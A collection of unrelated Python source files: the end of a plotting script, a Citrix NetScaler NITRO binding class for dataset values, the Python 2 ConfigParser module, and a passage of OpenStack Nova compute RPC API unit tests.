ax.plot_surface(*meshgrid, firemap.data["ignition"], color="red")
fig.show()
print("THE END")
|
|
#
# Copyright (c) 2008-2015 Citrix Systems, Inc.
#
# Licensed under the Apache License, Version 2.0 (the "License")
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
#
from nssrc.com.citrix.netscaler.nitro.resource.base.base_resource import base_resource
from nssrc.com.citrix.netscaler.nitro.resource.base.base_resource import base_response
from nssrc.com.citrix.netscaler.nitro.service.options import options
from nssrc.com.citrix.netscaler.nitro.exception.nitro_exception import nitro_exception
from nssrc.com.citrix.netscaler.nitro.util.nitro_util import nitro_util
class policydataset_value_binding(base_resource) :
""" Binding class showing the value that can be bound to policydataset.
"""
def __init__(self) :
self._value = ""
self._index = 0
self._name = ""
self.___count = 0
@property
def value(self) :
"""Value of the specified type that is associated with the dataset.
"""
try :
return self._value
except Exception as e:
raise e
@value.setter
def value(self, value) :
"""Value of the specified type that is associated with the dataset.
"""
try :
self._value = value
except Exception as e:
raise e
@property
def name(self) :
"""Name of the dataset to which to bind the value.<br/>Minimum length = 1.
"""
try :
return self._name
except Exception as e:
raise e
@name.setter
def name(self, name) :
"""Name of the dataset to which to bind the value.<br/>Minimum length = 1
"""
try :
self._name = name
except Exception as e:
raise e
@property
def index(self) :
"""The index of the value (ipv4, ipv6, number) associated with the set.
"""
try :
return self._index
except Exception as e:
raise e
@index.setter
def index(self, index) :
"""The index of the value (ipv4, ipv6, number) associated with the set.
"""
try :
self._index = index
except Exception as e:
raise e
def _get_nitro_response(self, service, response) :
""" converts nitro response into object and returns the object array in case of get request.
"""
try :
result = service.payload_formatter.string_to_resource(policydataset_value_binding_response, response, self.__class__.__name__)
if(result.errorcode != 0) :
if (result.errorcode == 444) :
service.clear_session(self)
if result.severity :
if (result.severity == "ERROR") :
raise nitro_exception(result.errorcode, str(result.message), str(result.severity))
else :
raise nitro_exception(result.errorcode, str(result.message), str(result.severity))
return result.policydataset_value_binding
except Exception as e :
raise e
def _get_object_name(self) :
""" Returns the value of object identifier argument
"""
try :
if (self.name) :
return str(self.name)
return None
except Exception as e :
raise e
@classmethod
def add(cls, client, resource) :
try :
if resource and type(resource) is not list :
updateresource = policydataset_value_binding()
updateresource.name = resource.name
updateresource.value = resource.value
return updateresource.update_resource(client)
else :
if resource and len(resource) > 0 :
updateresources = [policydataset_value_binding() for _ in range(len(resource))]
for i in range(len(resource)) :
updateresources[i].name = resource[i].name
updateresources[i].value = resource[i].value
return cls.update_bulk_request(client, updateresources)
except Exception as e :
raise e
@classmethod
def delete(cls, client, resource) :
try :
if resource and type(resource) is not list :
deleteresource = policydataset_value_binding()
deleteresource.name = resource.name
deleteresource.value = resource.value
return deleteresource.delete_resource(client)
else :
if resource and len(resource) > 0 :
deleteresources = [policydataset_value_binding() for _ in range(len(resource))]
for i in range(len(resource)) :
deleteresources[i].name = resource[i].name
deleteresources[i].value = resource[i].value
return cls.delete_bulk_request(client, deleteresources)
except Exception as e :
raise e
@classmethod
def get(cls, service, name) :
""" Use this API to fetch policydataset_value_binding resources.
"""
try :
obj = policydataset_value_binding()
obj.name = name
response = obj.get_resources(service)
return response
except Exception as e:
raise e
@classmethod
def get_filtered(cls, service, name, filter_) :
""" Use this API to fetch filtered set of policydataset_value_binding resources.
		Filter string should be in JSON format, e.g. "port:80,servicetype:HTTP".
"""
try :
obj = policydataset_value_binding()
obj.name = name
option_ = options()
option_.filter = filter_
response = obj.getfiltered(service, option_)
return response
except Exception as e:
raise e
@classmethod
def count(cls, service, name) :
""" Use this API to count policydataset_value_binding resources configued on NetScaler.
"""
try :
obj = policydataset_value_binding()
obj.name = name
option_ = options()
option_.count = True
response = obj.get_resources(service, option_)
if response :
return response[0].__dict__['___count']
return 0
except Exception as e:
raise e
@classmethod
def count_filtered(cls, service, name, filter_) :
""" Use this API to count the filtered set of policydataset_value_binding resources.
		Filter string should be in JSON format, e.g. "port:80,servicetype:HTTP".
"""
try :
obj = policydataset_value_binding()
obj.name = name
option_ = options()
option_.count = True
option_.filter = filter_
response = obj.getfiltered(service, option_)
if response :
return response[0].__dict__['___count']
return 0
except Exception as e:
raise e
class policydataset_value_binding_response(base_response) :
def __init__(self, length=1) :
self.policydataset_value_binding = []
self.errorcode = 0
self.message = ""
self.severity = ""
self.sessionid = ""
self.policydataset_value_binding = [policydataset_value_binding() for _ in range(length)]
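# Minimal usage sketch for the binding class above (assumes an authenticated
# nitro_service instance `client`; the dataset name and value are
# illustrative):
#
#     binding = policydataset_value_binding()
#     binding.name = "my_dataset"
#     binding.value = "10.0.0.1"
#     policydataset_value_binding.add(client, binding)
#     bound = policydataset_value_binding.get(client, "my_dataset")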
|
|
"""Configuration file parser.
A setup file consists of sections, led by a "[section]" header,
and followed by "name: value" entries, with continuations and such in
the style of RFC 822.
The option values can contain format strings which refer to other values in
the same section, or values in a special [DEFAULT] section.
For example:
something: %(dir)s/whatever
would resolve the "%(dir)s" to the value of dir. All reference
expansions are done late, on demand.
Intrinsic defaults can be specified by passing them into the
ConfigParser constructor as a dictionary.
class:
ConfigParser -- responsible for parsing a list of
configuration files, and managing the parsed database.
methods:
__init__(defaults=None)
create the parser and specify a dictionary of intrinsic defaults. The
keys must be strings, the values must be appropriate for %()s string
interpolation. Note that `__name__' is always an intrinsic default;
its value is the section's name.
sections()
return all the configuration section names, sans DEFAULT
has_section(section)
return whether the given section exists
has_option(section, option)
return whether the given option exists in the given section
options(section)
return list of configuration options for the named section
read(filenames)
read and parse the list of named configuration files, given by
name. A single filename is also allowed. Non-existing files
are ignored. Return list of successfully read files.
readfp(fp, filename=None)
read and parse one configuration file, given as a file object.
The filename defaults to fp.name; it is only used in error
messages (if fp has no `name' attribute, the string `<???>' is used).
get(section, option, raw=False, vars=None)
return a string value for the named option. All % interpolations are
expanded in the return values, based on the defaults passed into the
constructor and the DEFAULT section. Additional substitutions may be
provided using the `vars' argument, which must be a dictionary whose
contents override any pre-existing defaults.
getint(section, option)
like get(), but convert value to an integer
getfloat(section, option)
like get(), but convert value to a float
getboolean(section, option)
like get(), but convert value to a boolean (currently case
insensitively defined as 0, false, no, off for False, and 1, true,
yes, on for True). Returns False or True.
items(section, raw=False, vars=None)
return a list of tuples with (name, value) for each option
in the section.
remove_section(section)
remove the given file section and all its options
remove_option(section, option)
remove the given option from the given section
set(section, option, value)
set the given option
write(fp)
write the configuration state in .ini format
"""
try:
from collections import OrderedDict as _default_dict
except ImportError:
# fallback for setup.py which hasn't yet built _collections
_default_dict = dict
import re
__all__ = ["NoSectionError", "DuplicateSectionError", "NoOptionError",
"InterpolationError", "InterpolationDepthError",
"InterpolationSyntaxError", "ParsingError",
"MissingSectionHeaderError",
"ConfigParser", "SafeConfigParser", "RawConfigParser",
"DEFAULTSECT", "MAX_INTERPOLATION_DEPTH"]
DEFAULTSECT = "DEFAULT"
MAX_INTERPOLATION_DEPTH = 10
# exception classes
class Error(Exception):
"""Base class for ConfigParser exceptions."""
def _get_message(self):
"""Getter for 'message'; needed only to override deprecation in
BaseException."""
return self.__message
def _set_message(self, value):
"""Setter for 'message'; needed only to override deprecation in
BaseException."""
self.__message = value
# BaseException.message has been deprecated since Python 2.6. To prevent
# DeprecationWarning from popping up over this pre-existing attribute, use
# a new property that takes lookup precedence.
message = property(_get_message, _set_message)
def __init__(self, msg=''):
self.message = msg
Exception.__init__(self, msg)
def __repr__(self):
return self.message
__str__ = __repr__
class NoSectionError(Error):
"""Raised when no section matches a requested option."""
def __init__(self, section):
Error.__init__(self, 'No section: %r' % (section,))
self.section = section
self.args = (section, )
class DuplicateSectionError(Error):
"""Raised when a section is multiply-created."""
def __init__(self, section):
Error.__init__(self, "Section %r already exists" % section)
self.section = section
self.args = (section, )
class NoOptionError(Error):
"""A requested option was not found."""
def __init__(self, option, section):
Error.__init__(self, "No option %r in section: %r" %
(option, section))
self.option = option
self.section = section
self.args = (option, section)
class InterpolationError(Error):
"""Base class for interpolation-related exceptions."""
def __init__(self, option, section, msg):
Error.__init__(self, msg)
self.option = option
self.section = section
self.args = (option, section, msg)
class InterpolationMissingOptionError(InterpolationError):
"""A string substitution required a setting which was not available."""
def __init__(self, option, section, rawval, reference):
msg = ("Bad value substitution:\n"
"\tsection: [%s]\n"
"\toption : %s\n"
"\tkey : %s\n"
"\trawval : %s\n"
% (section, option, reference, rawval))
InterpolationError.__init__(self, option, section, msg)
self.reference = reference
self.args = (option, section, rawval, reference)
class InterpolationSyntaxError(InterpolationError):
"""Raised when the source text into which substitutions are made
does not conform to the required syntax."""
class InterpolationDepthError(InterpolationError):
"""Raised when substitutions are nested too deeply."""
def __init__(self, option, section, rawval):
msg = ("Value interpolation too deeply recursive:\n"
"\tsection: [%s]\n"
"\toption : %s\n"
"\trawval : %s\n"
% (section, option, rawval))
InterpolationError.__init__(self, option, section, msg)
self.args = (option, section, rawval)
class ParsingError(Error):
"""Raised when a configuration file does not follow legal syntax."""
def __init__(self, filename):
Error.__init__(self, 'File contains parsing errors: %s' % filename)
self.filename = filename
self.errors = []
self.args = (filename, )
def append(self, lineno, line):
self.errors.append((lineno, line))
self.message += '\n\t[line %2d]: %s' % (lineno, line)
class MissingSectionHeaderError(ParsingError):
"""Raised when a key-value pair is found before any section header."""
def __init__(self, filename, lineno, line):
Error.__init__(
self,
'File contains no section headers.\nfile: %s, line: %d\n%r' %
(filename, lineno, line))
self.filename = filename
self.lineno = lineno
self.line = line
self.args = (filename, lineno, line)
class RawConfigParser:
def __init__(self, defaults=None, dict_type=_default_dict,
allow_no_value=False):
self._dict = dict_type
self._sections = self._dict()
self._defaults = self._dict()
if allow_no_value:
self._optcre = self.OPTCRE_NV
else:
self._optcre = self.OPTCRE
if defaults:
for key, value in defaults.items():
self._defaults[self.optionxform(key)] = value
def defaults(self):
return self._defaults
def sections(self):
"""Return a list of section names, excluding [DEFAULT]"""
# self._sections will never have [DEFAULT] in it
return self._sections.keys()
def add_section(self, section):
"""Create a new section in the configuration.
Raise DuplicateSectionError if a section by the specified name
already exists. Raise ValueError if name is DEFAULT or any of its
case-insensitive variants.
"""
if section.lower() == "default":
raise ValueError, 'Invalid section name: %s' % section
if section in self._sections:
raise DuplicateSectionError(section)
self._sections[section] = self._dict()
def has_section(self, section):
"""Indicate whether the named section is present in the configuration.
The DEFAULT section is not acknowledged.
"""
return section in self._sections
def options(self, section):
"""Return a list of option names for the given section name."""
try:
opts = self._sections[section].copy()
except KeyError:
raise NoSectionError(section)
opts.update(self._defaults)
if '__name__' in opts:
del opts['__name__']
return opts.keys()
def read(self, filenames):
"""Read and parse a filename or a list of filenames.
Files that cannot be opened are silently ignored; this is
designed so that you can specify a list of potential
configuration file locations (e.g. current directory, user's
home directory, systemwide directory), and all existing
configuration files in the list will be read. A single
filename may also be given.
Return list of successfully read files.
"""
if isinstance(filenames, basestring):
filenames = [filenames]
read_ok = []
for filename in filenames:
try:
fp = open(filename)
except IOError:
continue
self._read(fp, filename)
fp.close()
read_ok.append(filename)
return read_ok
def readfp(self, fp, filename=None):
"""Like read() but the argument must be a file-like object.
The `fp' argument must have a `readline' method. Optional
second argument is the `filename', which if not given, is
taken from fp.name. If fp has no `name' attribute, `<???>' is
used.
"""
if filename is None:
try:
filename = fp.name
except AttributeError:
filename = '<???>'
self._read(fp, filename)
def get(self, section, option):
opt = self.optionxform(option)
if section not in self._sections:
if section != DEFAULTSECT:
raise NoSectionError(section)
if opt in self._defaults:
return self._defaults[opt]
else:
raise NoOptionError(option, section)
elif opt in self._sections[section]:
return self._sections[section][opt]
elif opt in self._defaults:
return self._defaults[opt]
else:
raise NoOptionError(option, section)
def items(self, section):
try:
d2 = self._sections[section]
except KeyError:
if section != DEFAULTSECT:
raise NoSectionError(section)
d2 = self._dict()
d = self._defaults.copy()
d.update(d2)
if "__name__" in d:
del d["__name__"]
return d.items()
def _get(self, section, conv, option):
return conv(self.get(section, option))
def getint(self, section, option):
return self._get(section, int, option)
def getfloat(self, section, option):
return self._get(section, float, option)
_boolean_states = {'1': True, 'yes': True, 'true': True, 'on': True,
'0': False, 'no': False, 'false': False, 'off': False}
def getboolean(self, section, option):
v = self.get(section, option)
if v.lower() not in self._boolean_states:
raise ValueError, 'Not a boolean: %s' % v
return self._boolean_states[v.lower()]
def optionxform(self, optionstr):
return optionstr.lower()
def has_option(self, section, option):
"""Check for the existence of a given option in a given section."""
if not section or section == DEFAULTSECT:
option = self.optionxform(option)
return option in self._defaults
elif section not in self._sections:
return False
else:
option = self.optionxform(option)
return (option in self._sections[section]
or option in self._defaults)
def set(self, section, option, value=None):
"""Set an option."""
if not section or section == DEFAULTSECT:
sectdict = self._defaults
else:
try:
sectdict = self._sections[section]
except KeyError:
raise NoSectionError(section)
sectdict[self.optionxform(option)] = value
def write(self, fp):
"""Write an .ini-format representation of the configuration state."""
if self._defaults:
fp.write("[%s]\n" % DEFAULTSECT)
for (key, value) in self._defaults.items():
fp.write("%s = %s\n" % (key, str(value).replace('\n', '\n\t')))
fp.write("\n")
for section in self._sections:
fp.write("[%s]\n" % section)
for (key, value) in self._sections[section].items():
if key == "__name__":
continue
if (value is not None) or (self._optcre == self.OPTCRE):
key = " = ".join((key, str(value).replace('\n', '\n\t')))
fp.write("%s\n" % (key))
fp.write("\n")
def remove_option(self, section, option):
"""Remove an option."""
if not section or section == DEFAULTSECT:
sectdict = self._defaults
else:
try:
sectdict = self._sections[section]
except KeyError:
raise NoSectionError(section)
option = self.optionxform(option)
existed = option in sectdict
if existed:
del sectdict[option]
return existed
def remove_section(self, section):
"""Remove a file section."""
existed = section in self._sections
if existed:
del self._sections[section]
return existed
#
# Regular expressions for parsing section headers and options.
#
SECTCRE = re.compile(
r'\[' # [
r'(?P<header>[^]]+)' # very permissive!
r'\]' # ]
)
OPTCRE = re.compile(
r'(?P<option>[^:=\s][^:=]*)' # very permissive!
r'\s*(?P<vi>[:=])\s*' # any number of space/tab,
# followed by separator
# (either : or =), followed
# by any # space/tab
r'(?P<value>.*)$' # everything up to eol
)
OPTCRE_NV = re.compile(
r'(?P<option>[^:=\s][^:=]*)' # very permissive!
r'\s*(?:' # any number of space/tab,
r'(?P<vi>[:=])\s*' # optionally followed by
# separator (either : or
# =), followed by any #
# space/tab
r'(?P<value>.*))?$' # everything up to eol
)
def _read(self, fp, fpname):
"""Parse a sectioned setup file.
Each section in a setup file contains a title line at the top,
indicated by a name in square brackets (`[]'), plus key/value
options lines, indicated by `name: value' format lines.
Continuations are represented by an embedded newline then
leading whitespace. Blank lines, lines beginning with a '#',
and just about everything else are ignored.
"""
cursect = None # None, or a dictionary
optname = None
lineno = 0
e = None # None, or an exception
while True:
line = fp.readline()
if not line:
break
lineno = lineno + 1
# comment or blank line?
if line.strip() == '' or line[0] in '#;':
continue
if line.split(None, 1)[0].lower() == 'rem' and line[0] in "rR":
# no leading whitespace
continue
# continuation line?
if line[0].isspace() and cursect is not None and optname:
value = line.strip()
if value:
cursect[optname].append(value)
# a section header or option header?
else:
# is it a section header?
mo = self.SECTCRE.match(line)
if mo:
sectname = mo.group('header')
if sectname in self._sections:
cursect = self._sections[sectname]
elif sectname == DEFAULTSECT:
cursect = self._defaults
else:
cursect = self._dict()
cursect['__name__'] = sectname
self._sections[sectname] = cursect
# So sections can't start with a continuation line
optname = None
# no section header in the file?
elif cursect is None:
raise MissingSectionHeaderError(fpname, lineno, line)
# an option line?
else:
mo = self._optcre.match(line)
if mo:
optname, vi, optval = mo.group('option', 'vi', 'value')
optname = self.optionxform(optname.rstrip())
# This check is fine because the OPTCRE cannot
# match if it would set optval to None
if optval is not None:
if vi in ('=', ':') and ';' in optval:
# ';' is a comment delimiter only if it follows
# a spacing character
pos = optval.find(';')
if pos != -1 and optval[pos-1].isspace():
optval = optval[:pos]
optval = optval.strip()
# allow empty values
if optval == '""':
optval = ''
cursect[optname] = [optval]
else:
# valueless option handling
cursect[optname] = optval
else:
# a non-fatal parsing error occurred. set up the
# exception but keep going. the exception will be
# raised at the end of the file and will contain a
# list of all bogus lines
if not e:
e = ParsingError(fpname)
e.append(lineno, repr(line))
# if any parsing errors occurred, raise an exception
if e:
raise e
# join the multi-line values collected while reading
all_sections = [self._defaults]
all_sections.extend(self._sections.values())
for options in all_sections:
for name, val in options.items():
if isinstance(val, list):
options[name] = '\n'.join(val)
import UserDict as _UserDict
class _Chainmap(_UserDict.DictMixin):
"""Combine multiple mappings for successive lookups.
For example, to emulate Python's normal lookup sequence:
import __builtin__
pylookup = _Chainmap(locals(), globals(), vars(__builtin__))
"""
def __init__(self, *maps):
self._maps = maps
def __getitem__(self, key):
for mapping in self._maps:
try:
return mapping[key]
except KeyError:
pass
raise KeyError(key)
def keys(self):
result = []
seen = set()
for mapping in self._maps:
for key in mapping:
if key not in seen:
result.append(key)
seen.add(key)
return result
class ConfigParser(RawConfigParser):
def get(self, section, option, raw=False, vars=None):
"""Get an option value for a given section.
If `vars' is provided, it must be a dictionary. The option is looked up
in `vars' (if provided), `section', and in `defaults' in that order.
All % interpolations are expanded in the return values, unless the
optional argument `raw' is true. Values for interpolation keys are
looked up in the same manner as the option.
The section DEFAULT is special.
"""
sectiondict = {}
try:
sectiondict = self._sections[section]
except KeyError:
if section != DEFAULTSECT:
raise NoSectionError(section)
# Update with the entry specific variables
vardict = {}
if vars:
for key, value in vars.items():
vardict[self.optionxform(key)] = value
d = _Chainmap(vardict, sectiondict, self._defaults)
option = self.optionxform(option)
try:
value = d[option]
except KeyError:
raise NoOptionError(option, section)
if raw or value is None:
return value
else:
return self._interpolate(section, option, value, d)
def items(self, section, raw=False, vars=None):
"""Return a list of tuples with (name, value) for each option
in the section.
All % interpolations are expanded in the return values, based on the
defaults passed into the constructor, unless the optional argument
`raw' is true. Additional substitutions may be provided using the
`vars' argument, which must be a dictionary whose contents override
any pre-existing defaults.
The section DEFAULT is special.
"""
d = self._defaults.copy()
try:
d.update(self._sections[section])
except KeyError:
if section != DEFAULTSECT:
raise NoSectionError(section)
# Update with the entry specific variables
if vars:
for key, value in vars.items():
d[self.optionxform(key)] = value
options = d.keys()
if "__name__" in options:
options.remove("__name__")
if raw:
return [(option, d[option])
for option in options]
else:
return [(option, self._interpolate(section, option, d[option], d))
for option in options]
def _interpolate(self, section, option, rawval, vars):
# do the string interpolation
value = rawval
depth = MAX_INTERPOLATION_DEPTH
while depth: # Loop through this until it's done
depth -= 1
if value and "%(" in value:
value = self._KEYCRE.sub(self._interpolation_replace, value)
try:
value = value % vars
except KeyError, e:
raise InterpolationMissingOptionError(
option, section, rawval, e.args[0])
else:
break
if value and "%(" in value:
raise InterpolationDepthError(option, section, rawval)
return value
_KEYCRE = re.compile(r"%\(([^)]*)\)s|.")
def _interpolation_replace(self, match):
s = match.group(1)
if s is None:
return match.group()
else:
return "%%(%s)s" % self.optionxform(s)
class SafeConfigParser(ConfigParser):
def _interpolate(self, section, option, rawval, vars):
# do the string interpolation
L = []
self._interpolate_some(option, L, rawval, section, vars, 1)
return ''.join(L)
_interpvar_re = re.compile(r"%\(([^)]+)\)s")
def _interpolate_some(self, option, accum, rest, section, map, depth):
if depth > MAX_INTERPOLATION_DEPTH:
raise InterpolationDepthError(option, section, rest)
while rest:
p = rest.find("%")
if p < 0:
accum.append(rest)
return
if p > 0:
accum.append(rest[:p])
rest = rest[p:]
# p is no longer used
c = rest[1:2]
if c == "%":
accum.append("%")
rest = rest[2:]
elif c == "(":
m = self._interpvar_re.match(rest)
if m is None:
raise InterpolationSyntaxError(option, section,
"bad interpolation variable reference %r" % rest)
var = self.optionxform(m.group(1))
rest = rest[m.end():]
try:
v = map[var]
except KeyError:
raise InterpolationMissingOptionError(
option, section, rest, var)
if "%" in v:
self._interpolate_some(option, accum, v,
section, map, depth + 1)
else:
accum.append(v)
else:
raise InterpolationSyntaxError(
option, section,
"'%%' must be followed by '%%' or '(', found: %r" % (rest,))
def set(self, section, option, value=None):
"""Set an option. Extend ConfigParser.set: check for string values."""
# The only legal non-string value if we allow valueless
# options is None, so we need to check if the value is a
# string if:
# - we do not allow valueless options, or
# - we allow valueless options but the value is not None
if self._optcre is self.OPTCRE or value:
if not isinstance(value, basestring):
raise TypeError("option values must be strings")
if value is not None:
# check for bad percent signs:
# first, replace all "good" interpolations
tmp_value = value.replace('%%', '')
tmp_value = self._interpvar_re.sub('', tmp_value)
# then, check if there's a lone percent sign left
if '%' in tmp_value:
raise ValueError("invalid interpolation syntax in %r at "
"position %d" % (value, tmp_value.find('%')))
ConfigParser.set(self, section, option, value)
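# A minimal, self-contained usage sketch for the parsers above. It only
# runs when this module is executed directly; the section and option names
# are hypothetical.
if __name__ == '__main__':
    import StringIO
    sample = StringIO.StringIO(
        "[DEFAULT]\n"
        "dir: /tmp\n"
        "\n"
        "[paths]\n"
        "log: %(dir)s/app.log\n")
    cp = SafeConfigParser()
    cp.readfp(sample, 'sample.ini')
    # Interpolation resolves %(dir)s from the DEFAULT section on demand.
    print cp.get('paths', 'log')   # -> /tmp/app.log
    print cp.items('paths')        # e.g. [('dir', '/tmp'), ('log', '/tmp/app.log')]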
|
|
# Copyright 2012, Red Hat, Inc.
#
# Licensed under the Apache License, Version 2.0 (the "License"); you may
# not use this file except in compliance with the License. You may obtain
# a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS, WITHOUT
# WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied. See the
# License for the specific language governing permissions and limitations
# under the License.
"""
Unit Tests for nova.compute.rpcapi
"""
import contextlib
import mock
from oslo_config import cfg
from oslo_serialization import jsonutils
from nova.compute import rpcapi as compute_rpcapi
from nova import context
from nova.objects import block_device as objects_block_dev
from nova.objects import compute_node as objects_compute_node
from nova.objects import network_request as objects_network_request
from nova.objects import numa as objects_numa
from nova import test
from nova.tests.unit import fake_block_device
from nova.tests.unit import fake_instance
CONF = cfg.CONF
class ComputeRpcAPITestCase(test.NoDBTestCase):
def setUp(self):
super(ComputeRpcAPITestCase, self).setUp()
self.context = context.get_admin_context()
instance_attr = {'host': 'fake_host',
'instance_type_id': 1}
self.fake_instance_obj = fake_instance.fake_instance_obj(self.context,
**instance_attr)
self.fake_instance = jsonutils.to_primitive(self.fake_instance_obj)
self.fake_volume_bdm = jsonutils.to_primitive(
fake_block_device.FakeDbBlockDeviceDict(
{'source_type': 'volume', 'destination_type': 'volume',
'instance_uuid': self.fake_instance['uuid'],
'volume_id': 'fake-volume-id'}))
def test_serialized_instance_has_name(self):
self.assertIn('name', self.fake_instance)
def _test_compute_api(self, method, rpc_method,
assert_dict=False, **kwargs):
ctxt = context.RequestContext('fake_user', 'fake_project')
rpcapi = kwargs.pop('rpcapi_class', compute_rpcapi.ComputeAPI)()
self.assertIsNotNone(rpcapi.client)
self.assertEqual(rpcapi.client.target.topic, CONF.compute_topic)
orig_prepare = rpcapi.client.prepare
expected_version = kwargs.pop('version', rpcapi.client.target.version)
nova_network = kwargs.pop('nova_network', False)
expected_kwargs = kwargs.copy()
if ('requested_networks' in expected_kwargs and
expected_version == '3.23'):
expected_kwargs['requested_networks'] = []
for requested_network in kwargs['requested_networks']:
if not nova_network:
expected_kwargs['requested_networks'].append(
(requested_network.network_id,
str(requested_network.address),
requested_network.port_id))
else:
expected_kwargs['requested_networks'].append(
(requested_network.network_id,
str(requested_network.address)))
if 'host_param' in expected_kwargs:
expected_kwargs['host'] = expected_kwargs.pop('host_param')
else:
expected_kwargs.pop('host', None)
if 'legacy_limits' in expected_kwargs:
expected_kwargs['limits'] = expected_kwargs.pop('legacy_limits')
kwargs.pop('legacy_limits', None)
expected_kwargs.pop('destination', None)
if assert_dict:
expected_kwargs['instance'] = jsonutils.to_primitive(
expected_kwargs['instance'])
cast_and_call = ['confirm_resize', 'stop_instance']
if rpc_method == 'call' and method in cast_and_call:
if method == 'confirm_resize':
kwargs['cast'] = False
else:
kwargs['do_cast'] = False
if 'host' in kwargs:
host = kwargs['host']
elif 'destination' in kwargs:
host = kwargs['destination']
elif 'instances' in kwargs:
host = kwargs['instances'][0]['host']
else:
host = kwargs['instance']['host']
with contextlib.nested(
mock.patch.object(rpcapi.client, rpc_method),
mock.patch.object(rpcapi.client, 'prepare'),
mock.patch.object(rpcapi.client, 'can_send_version'),
) as (
rpc_mock, prepare_mock, csv_mock
):
prepare_mock.return_value = rpcapi.client
if 'return_bdm_object' in kwargs:
del kwargs['return_bdm_object']
rpc_mock.return_value = objects_block_dev.BlockDeviceMapping()
elif rpc_method == 'call':
rpc_mock.return_value = 'foo'
else:
rpc_mock.return_value = None
csv_mock.side_effect = (
lambda v: orig_prepare(version=v).can_send_version())
retval = getattr(rpcapi, method)(ctxt, **kwargs)
self.assertEqual(retval, rpc_mock.return_value)
prepare_mock.assert_called_once_with(version=expected_version,
server=host)
rpc_mock.assert_called_once_with(ctxt, method, **expected_kwargs)
def test_add_aggregate_host(self):
self._test_compute_api('add_aggregate_host', 'cast',
aggregate={'id': 'fake_id'}, host_param='host', host='host',
slave_info={})
def test_add_fixed_ip_to_instance(self):
self._test_compute_api('add_fixed_ip_to_instance', 'cast',
instance=self.fake_instance_obj, network_id='id',
version='3.12')
def test_attach_interface(self):
self._test_compute_api('attach_interface', 'call',
instance=self.fake_instance_obj, network_id='id',
port_id='id2', version='3.17', requested_ip='192.168.1.50')
def test_attach_volume(self):
self._test_compute_api('attach_volume', 'cast',
instance=self.fake_instance_obj, volume_id='id',
mountpoint='mp', bdm=self.fake_volume_bdm, version='3.16')
def test_change_instance_metadata(self):
self._test_compute_api('change_instance_metadata', 'cast',
instance=self.fake_instance_obj, diff={}, version='3.7')
@mock.patch('nova.compute.rpcapi.ComputeAPI._warn_buggy_live_migrations')
def test_check_can_live_migrate_destination(self, mock_warn):
self._test_compute_api('check_can_live_migrate_destination', 'call',
instance=self.fake_instance_obj,
destination='dest', block_migration=True,
disk_over_commit=True, version='3.32')
self.assertFalse(mock_warn.called)
@mock.patch('nova.compute.rpcapi.ComputeAPI._warn_buggy_live_migrations')
def test_check_can_live_migrate_destination_old_warning(self, mock_warn):
self.flags(compute='3.0', group='upgrade_levels')
self._test_compute_api('check_can_live_migrate_destination', 'call',
instance=self.fake_instance_obj,
destination='dest', block_migration=True,
disk_over_commit=True, version='3.0')
mock_warn.assert_called_once_with()
@mock.patch('nova.compute.rpcapi.ComputeAPI._warn_buggy_live_migrations')
def test_check_can_live_migrate_source(self, mock_warn):
self._test_compute_api('check_can_live_migrate_source', 'call',
instance=self.fake_instance_obj,
dest_check_data={"test": "data"}, version='3.32')
self.assertFalse(mock_warn.called)
@mock.patch('nova.compute.rpcapi.ComputeAPI._warn_buggy_live_migrations')
def test_check_can_live_migrate_source_old_warning(self, mock_warn):
self.flags(compute='3.0', group='upgrade_levels')
self._test_compute_api('check_can_live_migrate_source', 'call',
instance=self.fake_instance_obj,
dest_check_data={"test": "data"}, version='3.0')
mock_warn.assert_called_once_with()
def test_check_instance_shared_storage(self):
self._test_compute_api('check_instance_shared_storage', 'call',
instance=self.fake_instance_obj, data='foo',
version='3.29')
def test_confirm_resize_cast(self):
self._test_compute_api('confirm_resize', 'cast',
instance=self.fake_instance_obj, migration={'id': 'foo'},
host='host', reservations=list('fake_res'))
def test_confirm_resize_call(self):
self._test_compute_api('confirm_resize', 'call',
instance=self.fake_instance_obj, migration={'id': 'foo'},
host='host', reservations=list('fake_res'))
def test_detach_interface(self):
self._test_compute_api('detach_interface', 'cast',
version='3.17', instance=self.fake_instance_obj,
port_id='fake_id')
def test_detach_volume(self):
self._test_compute_api('detach_volume', 'cast',
instance=self.fake_instance_obj, volume_id='id',
version='3.25')
def test_finish_resize(self):
self._test_compute_api('finish_resize', 'cast',
instance=self.fake_instance_obj, migration={'id': 'foo'},
image='image', disk_info='disk_info', host='host',
reservations=list('fake_res'))
def test_finish_revert_resize(self):
self._test_compute_api('finish_revert_resize', 'cast',
instance=self.fake_instance_obj, migration={'id': 'fake_id'},
host='host', reservations=list('fake_res'))
def test_get_console_output(self):
self._test_compute_api('get_console_output', 'call',
instance=self.fake_instance_obj, tail_length='tl',
version='3.28')
def test_get_console_pool_info(self):
self._test_compute_api('get_console_pool_info', 'call',
console_type='type', host='host')
def test_get_console_topic(self):
self._test_compute_api('get_console_topic', 'call', host='host')
def test_get_diagnostics(self):
self._test_compute_api('get_diagnostics', 'call',
instance=self.fake_instance_obj, version='3.18')
def test_get_instance_diagnostics(self):
self._test_compute_api('get_instance_diagnostics', 'call',
assert_dict=True, instance=self.fake_instance_obj,
version='3.31')
def test_get_vnc_console(self):
self._test_compute_api('get_vnc_console', 'call',
instance=self.fake_instance_obj, console_type='type',
version='3.2')
def test_get_spice_console(self):
self._test_compute_api('get_spice_console', 'call',
instance=self.fake_instance_obj, console_type='type',
version='3.1')
def test_get_rdp_console(self):
self._test_compute_api('get_rdp_console', 'call',
instance=self.fake_instance_obj, console_type='type',
version='3.10')
def test_get_serial_console(self):
self._test_compute_api('get_serial_console', 'call',
instance=self.fake_instance_obj, console_type='serial',
version='3.34')
def test_validate_console_port(self):
self._test_compute_api('validate_console_port', 'call',
instance=self.fake_instance_obj, port="5900",
console_type="novnc", version='3.3')
def test_host_maintenance_mode(self):
self._test_compute_api('host_maintenance_mode', 'call',
host_param='param', mode='mode', host='host')
def test_host_power_action(self):
self._test_compute_api('host_power_action', 'call', action='action',
host='host')
def test_inject_network_info(self):
self._test_compute_api('inject_network_info', 'cast',
instance=self.fake_instance_obj)
